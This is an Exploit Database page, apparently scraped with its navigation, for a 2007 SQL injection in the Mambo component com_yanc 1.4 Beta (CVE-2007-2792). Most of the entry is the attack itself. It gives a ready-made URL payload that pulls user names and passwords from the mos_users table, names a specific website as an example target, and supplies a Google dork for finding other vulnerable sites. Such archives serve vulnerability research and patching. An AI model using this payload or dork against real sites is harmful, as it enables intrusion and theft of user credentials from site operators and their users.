Exploit Database - Logo

Mambo Component com_yanc 1.4 Beta - 'id' SQL Injection

EDB-ID: 3944 Author: Mehmet Ince Published: 2007-05-17
CVE: CVE-2007-2792 Type: Webapps Platform: PHP
Aliases: N/A Advisory/Source: N/A Tags: Vulnerability
E-DB Verified: Verified Exploit: Download Exploit Code Download / View Raw Vulnerable App: N/A
« Previous Exploit Next Exploit » 
------------------------------
-------------------------------

Mambo com_yanc v1.4 beta (id) Blind Remote SQL Injection Vuln

-------------------------------------------------------------

Bulan: Cyber-Security

-------------------------------------------------------------

Exploit: index.php?option=com_yanc&Itemid=9999999&listid=9999999/**/union/**/select/**/name,password/**/from/**/mos_users/*

Example:http://www.tnrb.net/

-------------------------------------------------------------

google dork: inurl:index.php?option=com_yanc

-------------------------------------------------------------

# milw0rm.com [2007-05-17]

Related Exploits

Trying to match CVEs (1): CVE-2007-2792
Trying to match OSVDBs (1): 37948
Other Possible E-DB Search Terms: Mambo Component com_yanc 1.4 Beta,  Mambo Component com_yanc
Date D V Title Author
2010-02-28Download Exploit Code Verified Joomla! Component com_yanc - SQL Injectionsnakespc
Menu